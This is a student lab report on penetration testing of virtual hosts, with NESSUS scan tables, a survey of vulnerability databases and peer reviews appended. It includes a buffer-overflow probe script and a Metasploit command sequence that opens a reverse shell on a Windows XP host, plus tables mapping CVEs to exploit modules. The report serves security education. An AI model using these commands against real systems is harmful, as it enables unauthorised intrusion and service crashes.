Abstract
The purpose of this exercise is to evaluate the concept of a security ‘exploit,’ both by application to a virtual testing environment and by examination of public vulnerability databases. First, we propose a theoretical definition by which to classify an ‘exploit.’ Next, we review the literature available for this exercise and its application to the research being done. We then enumerate the vulnerabilities of the virtual hosts in our test environment and associate these opportunities with exploit tools. Additionally, we test a subset of these exploit tools and evaluate their effectiveness against the virtual test machines. Finally, we survey public vulnerability databases and draw conclusions about the patterns present in these vulnerabilities with respect to the theoretical OSI network stack model.
Introduction
In examining the multitude of possible modes available by which to compromise the test machines used for this procedure, it became obvious that some limits of the term ‘exploit’ should be qualified. First, we must state that an ‘exploit’ is not inherently separate from other concepts such as ‘active’ or ‘passive’ reconnaissance, but can be a complementary part of these categories. We suggest that the term ‘exploit’ is simply a response to the concept of ‘opportunity,’ and therefore use this to develop a definition within the scope of this exercise. We mandate that an ‘exploit’ must be defined by three necessary components: opportunity, employment, and gain.
The ‘opportunity’ of vulnerability is a pre-condition to the ‘employment’ of an attack tool. Assuredly, this opportunity by itself is of little use if not acted upon; hence, only in the act of employment is an ‘exploit’ truly completed. Conversely, the ‘employment’ of a tool without ‘opportunity’ is destined to fail: one cannot win a contest which does not exist. To clarify, consider the opportunity presented by a password ‘sniffed’ off the network: in itself it is not an exploit. The use of this password to penetrate a system is the employment of this information: it is a window of attack acted upon, and therefore has ‘exploited’ this opportunity. Similarly, the awareness of an open port with a vulnerable service is an ‘opportunity,’ and the use of a tool to compromise the host is the ‘employment,’ the culmination of this exploit. Thus, we argue that both of these characteristics are necessary for an actual ‘exploit’ to occur: there exists a symbiotic property which cannot be violated.
The characteristic of ‘gain’ is almost always present by default, even if not in an obvious way. An attacker may ‘gain’ in crashing a server through use of a tool, even though the only thing ultimately accomplished is an increased sense of pride or self-satisfaction: hence even the most useless acts of vandalism have a component of ‘gain.’ We mention ‘gain’ only to be complete, but find it of little further use in categorizing security tools.
With this definition in mind, we face a number of important research areas. First, we explore the means and methods by which to ‘exploit’ our virtual test machines. Secondly, we attempt to utilize these means and methods in attack scenarios, and note whether any ‘exploit’ has occurred. Third, we analyze the collection of attack opportunities presented in public vulnerability databases with respect to the OSI construct.
Literature Review
This week’s reading is a mixture of articles concerning vulnerability testing. Red-Team Application Security Testing (Thompson, Chase, 2003) discusses security vulnerabilities that occur at the application level and methods for testing for these insecurities. Vendor System Vulnerability Testing Test Plan (Davidson, 2005) is a generic plan for testing SCADA systems at the Idaho National Laboratory. Network Penetration Testing (He, Bode, 2005) further describes penetration testing: what it is, why it is needed, and what tools can be used to conduct the tests.
Article: Red-Team Application Security Testing (Thompson, Chase, 2003)
This article begins with a description of the problems that create the need for network penetration testing. It describes the need to test like detectives instead of librarians; by this it means conducting an investigation to find security flaws rather than relying on lists of known flaws. It proceeds to describe methods for finding buffer overflow vulnerabilities within applications, recommending that a large application be decomposed into its various parts, which are then assessed individually. Standard functional testing within the software development lifecycle does not extend into the arena of identifying security vulnerabilities within the application.
Functional testing is concerned with ensuring that the software meets the requirements of the specification; security testing needs to be done outside of development and functional testing. Once applications are decomposed into functional sections, those sections are ranked based on their potential for being insecure and assigned to individuals or teams to test. Testers are assigned various roles, such as investigating components, executing tests, and acquiring tools. If the proper tools are not available, the specifications are passed to the development section to create them. The testers create problem reports that detail each vulnerability. Once the testing is completed, the reports are analyzed to determine common vulnerabilities, which can be used to speed up future testing.
There are four main causes of security vulnerabilities: dependency failures, unanticipated user input, design vulnerabilities, and implementation vulnerabilities. Applications often rely on external resources; when these resources do not function properly, they can leave the application in an insecure state, which is what causes dependency failures. Unanticipated user input can cause buffer overflows when input strings are longer than the internal buffer designed to hold them. Design vulnerabilities refer to security flaws rooted in the application’s design itself. Finally, implementation vulnerabilities occur when a secure specification is made insecure by the way it is implemented.
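To make the ‘unanticipated user input’ failure mode concrete, the sketch below (ours, not the article’s) shows the kind of naive long-string probe a tester might send to a network service; the host, port, and payload length are hypothetical placeholders.

    import socket

    def send_long_input(host, port, length=5000):
        """Send an overlong string to a service and report whether it still answers.
        A crash, hang, or dropped connection here hints at an unchecked internal buffer."""
        payload = b"A" * length  # input far longer than any reasonable field
        try:
            with socket.create_connection((host, port), timeout=5) as sock:
                sock.sendall(payload + b"\r\n")
                return sock.recv(1024)  # a normal reply suggests the input was handled
        except (socket.timeout, ConnectionError):
            return None  # silence or a reset may indicate the service failed

    # Hypothetical usage against a lab host only, never a production system:
    # print(send_long_input("192.168.3.3", 9999))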
Article: Vendor System Vulnerability Testing Test Plan (Davidson, 2005)
This paper is a generic plan for in-depth vulnerability testing of SCADA/EMS systems at the Idaho National Laboratory. The Idaho National Laboratory provides a test bed for testing the controls of a power transmission grid. This sample report begins by describing the attacker profile, which is best described as white box testing: the testers have knowledge of the system prior to the testing process. Using a Gantt chart, it shows the project timeline for the stages of vulnerability testing. It goes on to describe the configuration of the baseline system, which is the default system without any security in place. In the next section they discuss the testing strategy, specifying that it will not include a review of the software source code to check for buffer overflow vulnerabilities and other possible insecurities.
They proceed with an outline of the test cases. The time for each test case is not listed in this document because it is negotiated as part of the overall testing activity. The first test case is a baseline validation, which tests the as-delivered system prior to any modifications; this is done to capture the worst-case vulnerabilities. Once the baseline testing is done, they test the following targets of evaluation: unauthorized access and escalation of privileges, the operator’s workstation, central database access, changing alarms and commands, changing state in the RTU, the developer’s workstation, compromising the communication processor, data acquisition database access, and historian database access. For each of these targets of evaluation they document the allocated testing period, the test procedure, and the data requirements.
Next they discuss the methods by which they score the vulnerability of the system. Although a scoring system is not specified, they mention the Common Vulnerability Scoring System which was developed by the Department of Homeland Security’s National Infrastructure Advisory Council (NIAC).
They continue with the “rules of engagement”, which are the guidelines for how the tests are to be performed. These rules cover the safety and security of the system and its data. They conclude with a list of milestones and deliverables. The beginning and ending dates are left blank so that they can be filled in for the specific testing project.
Article: Network Penetration Testing (He, Bode, 2005)
This paper describes different types of penetration testing and tools that can be used in conducting penetration tests. Penetration testing is described as “breaking into networks to expose vulnerabilities” and is performed by ethical hackers: people who are hired by the organization to break into the system. Penetration testing can be classified as either announced or unannounced. In unannounced testing, only upper management and the ethical hackers are aware that the test is taking place; announced testing occurs with the full knowledge and cooperation of the IT staff. Another way of classifying penetration testing is as black box or crystal box testing (also known as white box testing).
In black box testing, the ethical hackers do not have any knowledge of the internal workings of the network and must spend considerable time obtaining this information to complete the penetration test. In crystal box or white box penetration testing, they are given information about the network prior to conducting the test. Regardless of the type of testing, they are to find as many vulnerabilities as possible within a given time period. The basic structure of a penetration test is: prepare, analyze, document, and clean up. The author lists several general vulnerabilities, as well as vulnerabilities that are specific to certain operating systems or applications. The author proceeds to list several tools that are commonly used in various aspects of penetration testing. One such tool is a product called CORE IMPACT, which automates the penetration testing process; another is ProCheckNet, which uses an artificial intelligence approach.
The author then discusses the unique problems that occur with wireless networks. One such problem is that wireless networks lack the physical layer security that wired networks have: unlike wired networks, which require a physical connection, wireless networks only know the bounds of their own signals. Even WEP-protected networks are easily breached using tools such as AirSnort, which passively monitors packets until it has gathered enough of them to determine the WEP encryption key.
These articles apply to our labs in a few different ways. They serve to increase our vocabulary of penetration testing terminology and help us to better understand some of the terminology we have already learned. Testing procedures, methods, and tools are discussed that can assist us when conducting our own penetration testing. We are also given a generic penetration testing plan that we can use as a basis for preparing our own, and the articles reinforce some of the reasons that penetration testing is needed.
Methodology and Procedure
Various methods were entertained for developing a list of exploits for the test machines. Initially, the NESSUS plug-in listing was consulted with an eye to constructing a database by which to search for vulnerabilities by service name, but this proved untenable due to the way in which the NESSUS web interface operated and the somewhat vague descriptions associated with the plug-ins themselves. It was then decided to attack the issue by using Common Vulnerabilities and Exposures (CVE) listing numbers to associate tools with vulnerabilities. This approach was chosen because NESSUS lists the CVE, where possible, for each vulnerability discovered on a scanned host.
To begin this search, the NESSUS program was installed on a copy of Windows XP Service Pack 3 within the VMware Workstation environment. All tests were performed via a Citrix connection to a remote desktop, and all hosts were virtual, as this provided the most flexibility and safety for this vulnerability scan. The Windows XP ‘tool host’ was brought online, along with four other machines: Debian Linux, Windows XP Service Pack 0, Windows Server 2003, and a separate Windows XP Service Pack 3 host. The Windows XP ‘tool host’ running NESSUS was configured with the static IP address 192.168.3.100 to easily differentiate it from the hosts being scanned.
The four test hosts were scanned in the same operation, with all plug-ins enabled on the NESSUS control interface, including the ‘dangerous’ and ‘experimental’ plug-ins, along with the ‘thorough’ and ‘SYN scanning’ options. The tests were performed and the results saved as an HTML report, which was then mailed to and accessed via an ‘offsite’ mail account for ease of examination. Each host and its reported vulnerabilities were catalogued into a table, along with CVE numbers where available. The vulnerabilities were classified and sorted by OSI layer and McCumber cube classification, and the CVE numbers were used to consult various sources, including the main CVE database, for known attack implementations. Results, when found, were entered into the tables. Some of the attack tools were tested, but others were not due to time constraints.
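As an illustration of the cataloguing step, the following Python sketch shows one way CVE identifiers could be pulled from the saved NESSUS HTML report and grouped by host; the report file name and the assumption that findings follow each host’s IP address in the text are ours, so treat it as a sketch of the approach rather than a parser for any particular NESSUS version.

    import re
    from collections import defaultdict

    CVE_PATTERN = re.compile(r"CVE-\d{4}-\d{4,}")
    HOST_PATTERN = re.compile(r"192\.168\.3\.\d+")  # the scanned subnet

    def cves_by_host(report_path="nessus_report.html"):
        """Group CVE identifiers under the most recently seen host address."""
        findings = defaultdict(set)
        current_host = "unknown"
        with open(report_path, encoding="utf-8", errors="ignore") as report:
            for line in report:
                host_match = HOST_PATTERN.search(line)
                if host_match:
                    current_host = host_match.group()
                for cve in CVE_PATTERN.findall(line):
                    findings[current_host].add(cve)
        return findings

    # for host, cves in sorted(cves_by_host().items()):
    #     print(host, ", ".join(sorted(cves)))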
It should be noted that we followed our ‘opportunity’ and ’employment’ system of classification in the layout of the vulnerability table. As we judged the opportunity to be the information resulting from the NESSUS scan, we matched each NESSUS result with an ’employment’ tool. For instance, the vulnerability presented by MAC address visibility (a rather minor security threat) was matched with a means to exploit this information, e.g. Ettercap via an ARP table poisoning.
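A minimal sketch of that pairing, assuming a hand-maintained lookup rather than anything NESSUS itself produces, might look like the following; the finding names, layers, and candidate tools mirror a few rows of our tables and would be extended by hand for each new scan.

    # Hand-built 'opportunity -> employment' lookup; the OSI layer and the
    # candidate tool are our own classifications, not NESSUS output.
    EMPLOYMENT = {
        "MAC identification": {"layer": 2, "tool": "Ettercap (ARP table poisoning)"},
        "ICMP timestamp available": {"layer": 3, "tool": "Wireshark"},
        "SMB NULL session (445/tcp)": {"layer": 5, "tool": "Nbtscan, net use, etc."},
        "RPC buffer overrun": {"layer": 5, "tool": "Metasploit module ms03_026_dcom"},
    }

    def classify(finding):
        """Return the OSI layer and candidate attack tool for a scan finding,
        or flag it as an opportunity with no known employment."""
        return EMPLOYMENT.get(finding, {"layer": None, "tool": "unknown/theoretical"})

    # print(classify("SMB NULL session (445/tcp)"))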
Results and Discussion
Exploit Discovery and Usage
The results of the virtual machine vulnerability scans are presented in tables one through four. It is remarkable that the only virtual host which exhibited serious security vulnerabilities was the Windows XP Service Pack 0 machine. All of the ‘Metasploit’ modules listed in the table were used against this host, and all succeeded. We first crashed the machine with each attack module; in a second test, we configured the ‘Metasploit’ framework to return a command shell to the attacking machine for each of the modules. An example of a successfully opened remote shell via the ‘killbill’ module is shown in figure 1. We did not run any of the source code based attack tools: time constraints forced us to use readily available ‘pre-made’ executables, although we do plan to test these source code tools after the substantial task of installing and configuring a compiler, creating build scripts, and rectifying platform compatibility issues is completed on our virtual ‘tool host.’ Additionally, most of the source code based attack tools appeared to be largely ‘proof of concept’ code listings (of dubious code quality and sparse documentation): they generally purport to do no more than crash the remote host. We believe these to ultimately be of little use in their current form, and are investigating the possibility of creating ‘Metasploit’ modules based on these specific vulnerabilities instead. For the other tools, such as ‘Wireshark’ and ‘Nbtscan,’ we generally relied on prior testing for verification, since we have found these to function reliably in previous exercises.
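For reference, the shell-returning tests followed the usual ‘Metasploit’ console pattern sketched below against the Windows XP Service Pack 0 host (192.168.3.3), with the ‘tool host’ (192.168.3.100) receiving the reverse shell; the module and payload paths are written as we recall them and may differ between framework versions, so the listing is illustrative rather than a verbatim transcript.

    msf > use exploit/windows/smb/ms08_067_netapi
    msf exploit(ms08_067_netapi) > set RHOST 192.168.3.3
    msf exploit(ms08_067_netapi) > set PAYLOAD windows/shell/reverse_tcp
    msf exploit(ms08_067_netapi) > set LHOST 192.168.3.100
    msf exploit(ms08_067_netapi) > exploit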
Vulnerability Database Evaluation
Vulnerability databases chronicle various bugs and flaws in software, generally with the intent that they be used by information technology professionals to better defend their systems and by software providers to improve their products. However, these same databases provide a convenient catalogue of possible exploits for attackers. Penetration testers should be aware of these databases in order to have a more robust knowledge base from which to draw attacks. Several vendors offer this service as a subscription or as part of other packages, but the same information can be found in open sources for the price of a bit more legwork.
The researchers examined four open source vulnerability databases in order to assess the kinds of vulnerabilities reported and the level of expertise displayed within the information. The researchers made a general search of the databases going back a year, and randomly selected three entries for closer examination. The researchers then took the most recent one-week period to assess the relationship of the listed vulnerabilities to the grid given in earlier labs.
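The layer percentages quoted below were produced with nothing more sophisticated than the tally sketched here; the sample entries are hypothetical stand-ins for a week’s worth of hand-classified listings.

    from collections import Counter

    def layer_share(entries):
        """Return the fraction of sampled entries assigned to each OSI layer.
        'entries' is a list of (description, osi_layer) pairs classified by hand."""
        counts = Counter(layer for _, layer in entries)
        total = sum(counts.values())
        return {layer: count / total for layer, count in counts.items()}

    # Hypothetical week of hand-classified entries:
    # sample = [("browser heap overflow", 7), ("web app SQL injection", 7), ("TCP stack DoS", 4)]
    # print(layer_share(sample))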
The Department of Homeland Security provides the United States Computer Emergency Readiness Team (US-CERT). One of the tools US-CERT provides is the Vulnerability Notes Database, a collection of reported vulnerabilities. US-CERT attempts to rank the severity of the vulnerabilities, keep information updated, and provide information on fixes or work-arounds. They provide links to additional information and the origin of the report whenever possible (Department of Homeland Security 2009). US-CERT lists three new vulnerabilities in the last month, and seventy-nine in the last year. Roughly 94% were layer seven vulnerabilities, and nearly 100% of the reported vulnerabilities fit in the technology processing category (Department of Homeland Security 2009).
Secunia is a Danish information security consulting firm. They research and publish vulnerabilities discovered by their own employees as well as those reported externally. Secunia claims to verify each instance before it is published to their database, as well as verifying solutions. Secunia attempts to rate the severity of vulnerabilities and provides solutions whenever possible. The search tool for the database makes getting historical numbers difficult, but they appear to release 10 to 15 new vulnerability notices daily. Looking at a sample of one week’s time, Secunia shows the same patterns: the majority (97%) of the vulnerabilities were in layer seven, and again almost all fit within the technology processing category, with the remainder falling into the realm of technology transmission (Secunia 2009).
The National Institute of Standards and Technology (NIST) maintains the National Vulnerability Database (NVD) as part of its Computer Security Division. Its purpose is to facilitate automation of vulnerability management, security measurement, and compliance. The database contains a vulnerability search engine, which focuses specifically on the software vulnerabilities and misconfigurations contained within. The database provides severity ratings based on attack vector, complexity of the exploit, necessity of authentication, and impact, which is based loosely on confidentiality, integrity, and availability. The database entries list links to other sources for additional or original advisories and solutions. In the past year, the NVD listed 5970 possible vulnerabilities. Here again, the majority of attacks fall in layer seven, at 92.5% in the last week. However, while nearly all of the vulnerabilities were technology-based, they appear to be more evenly distributed among the other traits (National Institute of Standards and Technology 2009).
The Open Source Vulnerability Database (OSVDB) is provided by “the community” in order to provide “accurate, detailed, current, and unbiased technical information.” Tenable Network Security sponsors the database. OSVDB takes a Wikipedia-style approach to alerts: information is submitted and updated “by the people”. Most of the vulnerabilities listed reference other sites as originators. The database provides possible solutions as well as some information about the type and vector of the attack. The database contains thousands of entries, with 100 listed over the last seven days. 94% of these were layer seven exploits, distributed much like those in the NVD (Open Source Vulnerability Database 2009).
These databases are by no means the only ones that exist. However, they represent the open source information available that is non-vendor specific. Vendors will often list vulnerabilities in their own products after they have patched them or found a solution to the problem. Other databases are available with less reputable content, or with more obviously malicious intent.
Interestingly, all four of the databases above reference other databases in some entries, sometimes to the point of being circular. All occasionally referenced the above-mentioned grey-area web sites. Of the four, only the Open Source Vulnerability Database had no evident method of verification. While each of the sites had some method for providing solutions, NIST simply referenced the source. Secunia was the only one of the four that appeared to have internal sources for vulnerability discovery and verification of both the vulnerability and the solution. Not all of the databases included the same exploits, and those that recurred generally appeared in only two or three. Based on this, the researchers recommend that penetration testers, and information security professionals in general, review more than one source of information to stay current.
Problems and Issues
Foremost, some vulnerabilities reported by NESSUS appeared largely ‘theoretical’ in nature, as no known exploit code was found capable of utilizing these vulnerabilities. Additionally, in an initial NESSUS test, the Windows XP Service Pack 3 target proved unresponsive. This was addressed by turning off the firewall, after which meaningful, if somewhat artificial, data could be gathered about vulnerabilities from this machine. Finally, the Debian virtual host network devices were initially absent: this was remedied by trial and error in conjunction with the logon network configuration message and manual configuration via ‘ifconfig.’
Conclusions
In conclusion, we have fulfilled our research tasks. We have developed a theoretical definition of a security ‘exploit,’ and have used it to construct a meaningful attack matrix from the information obtained with the NESSUS security tool. Furthermore, we have used this attack matrix to evaluate ‘exploit’ tools, and have demonstrated within realistic constraints that these tools can be quite effective: namely, by using the ‘Metasploit’ framework to invoke remote shells without credentials on a remote Windows XP Service Pack 0 virtual host. Additionally, we have evaluated existing literature and applied it to the research methods. We have also examined publicly available vulnerability databases, specifically US-CERT, Secunia, NVD, and OSVDB. From this research, we have found the majority of vulnerabilities to lie in the upper layers of the OSI model, largely in layer seven, and to be overwhelmingly associated with the technology-processing subspace of the McCumber cube construct. Finally, we have ascertained that, due to non-trivial questions encountered regarding database verification methods, more than one database must be examined in any meaningful search for vulnerabilities.
Charts, Tables, and Illustrations
Figure 1: Example of a remote shell obtained via the ‘killbill’ Metasploit module.
Table 1: Microsoft Windows XP Service Pack 3 No firewall (192.168.3.1)
OSI Layer | Vulnerability Description (port number/protocol if applicable) | CVE Number(s) if available | McCumber Coordinate | Exploit Tool
2 | MAC identification | | Technology, Transmission, Confidentiality | Ettercap
3 | ICMP timestamp available | CVE-1999-0524 | Technology, Transmission, Confidentiality | Wireshark
3 | Ping response | | Technology, Transmission, Confidentiality | Nmap
4 | TCP timestamps | | Technology, Transmission, Confidentiality | Wireshark
5 | SMB login (445/tcp) | CVE-1999-0504, CVE-1999-0505, CVE-1999-0506, CVE-2000-0222, CVE-2005-3595 | Technology, Storage, Confidentiality | Nbtscan, net use, etc.
5 | SMB Lanman (445/tcp) | | Technology, Storage, Confidentiality | Ophcrack
5 | SMB NULL session (445/tcp) | CVE-2002-1117 | Technology, Storage, Confidentiality | Nbtscan, net use, etc.
5 | NetBios name (137/udp) | | Technology, Storage, Confidentiality | Nbtscan
5 | SMB server (139/tcp) | | Technology, Storage, Confidentiality | Nbtscan
5 | DCE/RPC server running (135/tcp) | | Technology, Processing, Confidentiality | Microsoft PortQry
7 | NTP running (123/udp) | | Technology, Processing, Confidentiality | ntpq/ntpdc
Table 2: Debian Etch 2.6.24-etchnhalf.1-686 SMP (192.168.3.2)
OSI Layer | Vulnerability Description (port number/protocol if applicable) | CVE Number(s) if available | McCumber Coordinate | Exploit Tool
2 | MAC identification | | Technology, Transmission, Confidentiality | Ettercap
3 | ICMP timestamp | CVE-1999-0524 | Technology, Transmission, Confidentiality | Wireshark
3 | Ping response | | Technology, Transmission, Confidentiality | Nmap
Table 3: Microsoft Windows XP Service Pack 0 (192.168.3.3)
OSI Layer | Vulnerability Description (port number/protocol if applicable) | CVE Number(s) if available | McCumber Coordinate | Exploit Tool
2 | MAC identification | | Technology, Transmission, Confidentiality | Ettercap
3 | ICMP timestamp available | CVE-1999-0524 | Technology, Transmission, Confidentiality | Wireshark
3 | Ping response | | Technology, Transmission, Confidentiality | Nmap
3 | VPN server (500/udp) | | Technology, Transmission, Confidentiality | ike-scan
4 | TCP timestamps | | Technology, Transmission, Confidentiality | Wireshark
5 | SMB server (139/tcp) | | Technology, Storage, Confidentiality | Nbtscan
5 | NetBios name (137/udp) | | Technology, Storage, Confidentiality | Nbtscan
5 | DCE service enumeration (1025/tcp) | | Technology, Processing, Confidentiality | Microsoft PortQry
5 | DCE service enumeration (135/tcp) | | Technology, Processing, Confidentiality | Microsoft PortQry
5 | RPC buffer overrun | CVE-2003-0352 | Technology, Processing, Integrity | Metasploit module ms03_026_dcom
5 | SMB login (445/tcp) | CVE-1999-0504, CVE-1999-0505, CVE-1999-0506, CVE-2000-0222, CVE-2005-3595 | Technology, Storage, Confidentiality | Nbtscan, net use, etc.
5 | SMB Lanman (445/tcp) | | Technology, Storage, Confidentiality | Ophcrack
5 | SMB NULL session (445/tcp) | CVE-2002-1117 | Technology, Storage, Confidentiality | Nbtscan, net use, etc.
5 | DCE/RPC server running (135/tcp) | | Technology, Processing, Confidentiality | Microsoft PortQry
5 | SMB packet overflow DoS | CVE-2002-0724 | Technology, Processing, Availability | smbnuke at (1)
5 | NTLM packet exploit | CVE-2003-0818 | Technology, Processing, Confidentiality | Metasploit module ms04_007_killbill
5 | LSASS service exploit | CVE-2003-0533 | Technology, Processing, Confidentiality | Metasploit module ms04_011_lsass
5 | SMB NULL session/named pipe exploit | CVE-2005-0051 | Technology, Processing, Confidentiality | Unknown
5 | SMB implementation flaw exploit | CVE-2005-1206 | Technology, Processing, Confidentiality | Unknown
5 | RPC interface exploit | CVE-2003-0715, CVE-2003-0528, CVE-2003-0605 | Technology, Processing, Confidentiality | MS Windows (RPC2) Universal Exploit & DoS (RPC3) (MS03-039) at (2)
5 | Printer Spooler service exploit | CVE-2005-1984 | Technology, Processing, Availability | Unknown
5 | SMB share enumeration | | Technology, Storage, Confidentiality | Nbtscan
5 | SMB memory corruption | CVE-2008-4834, CVE-2008-4835, CVE-2008-4114 | Technology, Storage, Availability | Unknown
5 | ‘Server’ service buffer overrun | CVE-2006-3439 | Technology, Storage, Confidentiality | Metasploit module ms06_040_netapi
5 | ‘Server’ service heap overflow | CVE-2006-1314, CVE-2006-1315 | Technology, Storage, Confidentiality | MS Windows Mailslot Ring0 Memory Corruption Exploit (MS06-035) at (3)
5 | ‘Server’ service buffer overrun privilege escalation | CVE-2008-4250 | Technology, Storage, Confidentiality | Metasploit module ms08_067_netapi
5 | DCE service enumeration (1027/udp) | | Technology, Processing, Confidentiality | Microsoft PortQry
7 | MS Messenger exploit | CVE-2003-0717 | Technology, Processing, Availability | MS Windows Messenger Service Denial of Service Exploit (MS03-043) at (4)
7 | NTP running (123/udp) | | Technology, Processing, Confidentiality | ntpq/ntpdc
7 | UPnP TCP helper (5000/tcp) | CVE-2001-0876 | Technology, Processing, Integrity | MS Windows Plug-and-Play (Umpnpmgr.dll) DoS Exploit (MS05-047) at (5) (probably)
Table 4: Microsoft Server 2003: No firewall (192.168.3.4)
OSI Layer | Vulnerability Description (port number/protocol if applicable) | CVE Number(s) if available | McCumber Coordinate | Exploit Tool
2 | MAC identification | | Technology, Transmission, Confidentiality | Ettercap
3 | ICMP timestamp available | CVE-1999-0524 | Technology, Transmission, Confidentiality | Wireshark
3 | Ping response | | Technology, Transmission, Confidentiality | Nmap
4 | TCP timestamps | | Technology, Transmission, Confidentiality | Wireshark
5 | NetBios name (137/udp) | | Technology, Storage, Confidentiality | Nbtscan
5 | SMB login (445/tcp) | CVE-1999-0504, CVE-1999-0505, CVE-1999-0506, CVE-2000-0222, CVE-2005-3595 | Technology, Storage, Confidentiality | Nbtscan, net use, etc.
5 | SMB Lanman (445/tcp) | | Technology, Storage, Confidentiality | Ophcrack
5 | SMB NULL session (445/tcp) | CVE-2002-1117 | Technology, Storage, Confidentiality | Nbtscan, net use, etc.
5 | DCE/RPC server running (135/tcp) | | Technology, Processing, Confidentiality | Microsoft PortQry
5 | SMB server (139/tcp) | | Technology, Storage, Confidentiality | Nbtscan
5 | DCE service enumeration (445/tcp) | | Technology, Processing, Confidentiality | Microsoft PortQry
5 | SMB Lanman pipe browse listing | | Technology, Storage, Confidentiality | Windows API
5 | DCE service enumeration (1025/tcp) | | Technology, Processing, Confidentiality | Microsoft PortQry
5 | DCE/RPC service enumeration (135/tcp) | | Technology, Processing, Confidentiality | Microsoft PortQry
7 | NTP running (123/udp) | | Technology, Processing, Confidentiality | ntpq/ntpdc
References
Davidson, J. R. (2005, January). Vendor System Vulnerability Testing Test Plan. Idaho National Laboratory. pp. 1-23.
Department of Homeland Security. (2009). “US-CERT Vulnerability Notes Database.” Retrieved June 25, 2009, from http://www.kb.cert.org/vuls
He, L., & Bode, N. (n.d.). Network Penetration Testing.
National Institute of Standards and Technology. (2009). “National Vulnerability Database.” Retrieved July 4, 2009, from http://nvd.nist.gov/
Open Source Vulnerability Database. (2009). “OSVDB.” Retrieved July 4, 2009, from http://osvdb.org
Secunia. (2009). “Secunia Vulnerability and Advisory Database.” Retrieved June 25, 2009, from http://secunia.com/advisories/search/?
Thompson, H. H., & Chase, S. G. (2003, November). Red-Team Application Security Testing. Dr. Dobb’s Journal, pp. 18-25.
Team three presents, as usual, a well thought out, well designed lab report for lab four. While their abstract lists the steps that will be completed as part of the lab, it is lacking in length as per the syllabus. The introduction to the lab defines a number of terms that will be covered in the lab and really helps the reader to understand what is going to be discussed in more detail. Their explanation really breaks down the scope of what will be discussed in the lab, almost to the point of over explanation. In team three’s literature review they present an introductory paragraph that I feel is an attempt to bring the articles together and relate them to the lab. This attempt is apparently flawed, as the literature review itself lacks any type of cohesion and is nothing more than a list of the articles for lab four, with APA style citations in the headings for each article only. This is the area where team three needs to improve. Their literature reviews lack cohesion and even in-text citations. Please visit the Purdue Online Writing Lab (OWL) to gain a better understanding of how to conduct a proper literature review with proper in-text citations. The methods section of team three’s lab report details the process they went through to complete the findings section. They list a problem with the NESSUS web interface which, in my opinion, should be in the issues section, not the methods section, as it is in fact an issue with their strategy. In the findings section team three first explains that Metasploit worked only with the Windows XP SP0 host, and didn’t really have any luck with the other hosts in the VM network. This should be quite obvious, as Windows XP is the longest running version of Windows, and “hackers” have had plenty of time to generate good, sound, automated exploits for the RTM release of Windows XP. Team three then lists the National Vulnerability Database, US-CERT, Secunia, and OSVDB as their chosen vulnerability databases. These seem to be the vulnerability databases of choice for most of the lab four reports, as these results are in line with team two and team five as well. I agree with team three’s issues that most of the vulnerabilities listed by NESSUS were largely non-exploitable, as no exploit code could be found to actually perform the exploit. The conclusions presented by team three are sound and logical based on the lab report that they presented. Team three’s first table is remarkably lacking in exploits for many of the lower layers of the Windows XP protocol stack; the Debian list is even shorter still. This is either because Microsoft and the like have done an extremely good job in protecting their latest releases, or team three did the lab wrong. If the former is the case, I foresee an issue when it comes to lab seven. Finally, the Windows Server 2003 table is much like the Windows XP SP3 table, which suggests that the former is more likely true. Team three has presented a well balanced report for lab four.
This group’s abstract is put together very well. The group gives the purpose of the lab and then breaks the lab down and explains each part of it in a very informative and professional manner. Next the group gives an introduction to the lab. In the introduction the group gives a complete explanation of what an exploit is. They break the definition of the word exploit down into three components and define each of the components. I really like the way that the group did this. This definition helped in explaining what an exploit is and opens up a way to look at the word with respect to the lab. In the last part of the introduction the group again explains what will be done in this lab, but in a simpler way. The literature review starts off with a brief explanation of each of the readings given in the lab. Then the literature review goes into more detail on each of the readings separately. Each of the descriptions of the articles seems to be just rehashing what was said in the article. The group does not explain the research question, the research methodology, or any errors or omissions. The group also does not tie each of the articles into each other and show how they are related. At the end of the literature review the group does show how the articles relate to the current lab. I believe that the group should have spent more time explaining how the articles were put together and how they tie into each other and the lab itself, and not on simplifying what was said in the articles. In the methodology the group gives a very good explanation of how they put together the scan with Nessus and classified the results according to the OSI model and McCumber’s cube. They explained all the steps in this process very thoroughly. The methodology was missing a lot of other parts, though. The group did not cover any stand-alone tools and how they tested them. Also, the group did not cover any description of how they were going to research the databases of vulnerabilities explained in the last part of the lab. The group seemed to just concentrate on one section of the first part of the lab. The group could have added what terms they were going to use in the search for sites that maintain a current database of vulnerabilities and the method by which they were going to test how much expertise each site had. In the results section of this group’s lab they start off by describing what they discovered while creating the table of exploits. The group does a nice job describing the process of how the tests were carried out and the results that they discovered after the testing was done. They could have added some of this into the methodology section, though. The next part of the results section covers the last part of the lab. This section started off with a very nice introduction to this part of the lab. They give a definition of what a vulnerability database is and how it can aid in penetration testing and at the same time aid in malicious use. The next part of this section gives the way that they went about finding the vulnerability databases and how they categorized them. This should have gone up in the methodology section of this paper. The group goes on to describe each of the four sites they found and explain how they fit into the OSI model and McCumber’s cube using samplings of the vulnerabilities found on each site. The group does a nice job in describing the pros and cons of each of the sites they researched.
At the end of the results the group states that the sites did not share very many similar vulnerabilities, so penetration testers need to be aware of this and need to use multiple sites to keep current. In the issues section the group had trouble running some of the exploits in Nessus against the Windows XP SP3 virtual machine; they found out that the firewall was blocking this. Wouldn’t that tell them that, because the firewall was on and actively blocking the exploits, the targeted virtual machine was secure against those vulnerabilities, and that turning off the firewall was defeating the purpose of the test? Also, if I remember correctly, the professor mentioned at the meeting we had that we only had to test against one machine. The group does do a nice job in the conclusion. They wrap up how they went about each section of the lab and give a brief description of the results. Then they explain what they learned in each part of the lab.
The discussion in the introduction regarding the term ‘exploit’ could use some literature to back it up. The discussion on the three components that make up an exploit according to your definition could have been tied back to previous lab assignments. The literature review was merely a listing of the articles that were assigned for reading and a summary of each. The summaries were well written and complete but didn’t add much value to the lab. Tying the concepts in to the lab exercises and the discussion in the introductory section into the literature review would make the content more relevant to the task at hand.
The methodology section had good details about the environment used to do the initial testing for part one of the lab exercises and even contained a good pun. Part two was handled very briefly though the example given at the end gave good insight into the procedures. It was nice to see the information from the introduction on the parts of an exploit brought back in to the process. The results section was well written and described the process of testing the exploit tools very frankly. Instead of glossing over why some tools weren’t used or didn’t work, the authors plainly state the information and move on.
